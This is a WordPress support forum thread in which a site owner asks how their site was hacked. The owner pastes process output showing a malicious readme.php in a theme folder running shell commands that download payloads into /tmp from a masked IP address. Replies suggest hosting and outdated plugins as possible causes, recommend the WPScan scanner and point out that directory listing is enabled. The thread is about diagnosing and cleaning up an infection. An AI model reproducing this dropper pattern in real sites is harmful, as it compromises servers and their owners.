my site was hacked – curious how or what caused it

  • I noticed this:

    ps -ef |grep vivithem
vivithem 23884 3125 0 Nov23 ? 00:00:00 /usr/bin/php /home/vivithem/public_html/wp-content/themes/montezuma/readme.php
vivithem 23886 23884 0 Nov23 ? 00:00:00 sh -c cd /tmp ; /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/951/d/sess_35ab70d2284300fcd5c7ca3a3c11b42a 1> /dev/null 2> /dev/null && echo OK
vivithem 23887 23886 0 Nov23 ? 00:00:00 /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/951/d/sess_35ab70d2284300fcd5c7ca3a3c11b42a
vivithem 26182 3123 0 Nov23 ? 00:00:00 /usr/bin/php /home/vivithem/public_html/wp-content/themes/montezuma/readme.php
vivithem 26184 26182 0 Nov23 ? 00:00:00 sh -c cd /tmp ; /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/858/d/sess_03f7ac636967477c5e073a80b62eff4b 1> /dev/null 2> /dev/null && echo OK
vivithem 26185 26184 0 Nov23 ? 00:00:00 /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/858/d/sess_03f7ac636967477c5e073a80b62eff4b

    that readme.php file was a bin. I killed processes, and reinstalled the theme. Any idea how they could have got in? I changed passwords for FTP, cPanel, etc. I have no SSH access for this account as well. I am always on the latest version.

Viewing 13 replies - 1 through 13 (of 13 total)

  • @vivithemage
    Sorry for your troubles. It always sucks when things like this happens. As for how the exploit was put in place, well….. That is an unknown but there is only a few main ways things like this mainly happen.

    1. Your hosting! Yes, your hosting plays a HUGE role. Does your host use separate spaces for hosting? If not = Leave. Basically one infected site and jump ship and look for other accounts on a server (shared hosting).

    2. Vulnerable out-of-date software. This is mainly for plugins but themes are known to have holes as well. WordPress itself is vulnerable if not updated.

    What is your domain name? I can run a external scan of it and see if there is anything plugins that stick out as vulnerable.

    Thread Starter vivithemage

    (@vivithemage)

    They are seperate spaces, using cPanel.

    I update my plugins/themes/WP every other week or so when I log in, is that possibly too slow to catch it?

    domain – vivithemage.com

    What scan are you running? I wouldn’t mind knowing it.

    Thread Starter vivithemage

    (@vivithemage)

    Looks like I can’t include links to my domain, but it’s my username . com

    Also, I am on cPanel, so separate spaces are indeed in use.

    I update my WP/Themes/Plugins fairly regular, maybe once every other week when I happen to log into the admin panel.

    What’s the site you are using to do a scan? Would love to know it.

    Thread Starter vivithemage

    (@vivithemage)

    https://www.vivithemage.com is the domain

    Also, I am on cPanel, so separate spaces are indeed in use.

    I update my WP/Themes/Plugins fairly regular, maybe once every other week when I happen to log into the admin panel.

    What’s the site you are using to do a scan? Would love to know it.

    Thread Starter vivithemage

    (@vivithemage)

    [redacted] is the domain

    Also, I am on cPanel, so separate spaces are indeed in use.

    I update my WP/Themes/Plugins fairly regular, maybe once every other week when I happen to log into the admin panel.

    What’s the site you are using to do a scan? Would love to know it.

    You can use WP Scan. Check it out at https://github.com/wpscanteam/wpscan.

    FYI. Although updating is very important, plugins still remain vulnerable if not properly maintained.

    Thread Starter vivithemage

    (@vivithemage)

    Nice, it come up with anything?

    Sorry. My El Cap update seems to have whacked out my wpscan instance so I am out of the game for the time being.

    Thread Starter vivithemage

    (@vivithemage)

    Dang, was hoping there would be logs of such changes.

    @vivithemage

    I was able to get WP Scan back up and running. I did a scan and you look all up to date but you do have some server issues.

    You have directory listing enabled which is never a good thing. Append this to the end of your domain name and you can see what I am talking about.

    /wp-content/plugins/all-in-one-seo-pack/
    Thread Starter vivithemage

    (@vivithemage)

    I enabled that because I had problems with ZEN working. What problems can that cause?

    Thread Starter vivithemage

    (@vivithemage)

    I enabled that because I had problems with ZEN working. What problems can that cause?

    Directory listing does not cause and issue directly. However, an attacker can see your file structure and thus has a bit more information about your site.

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘my site was hacked – curious how or what caused it’ is closed to new replies.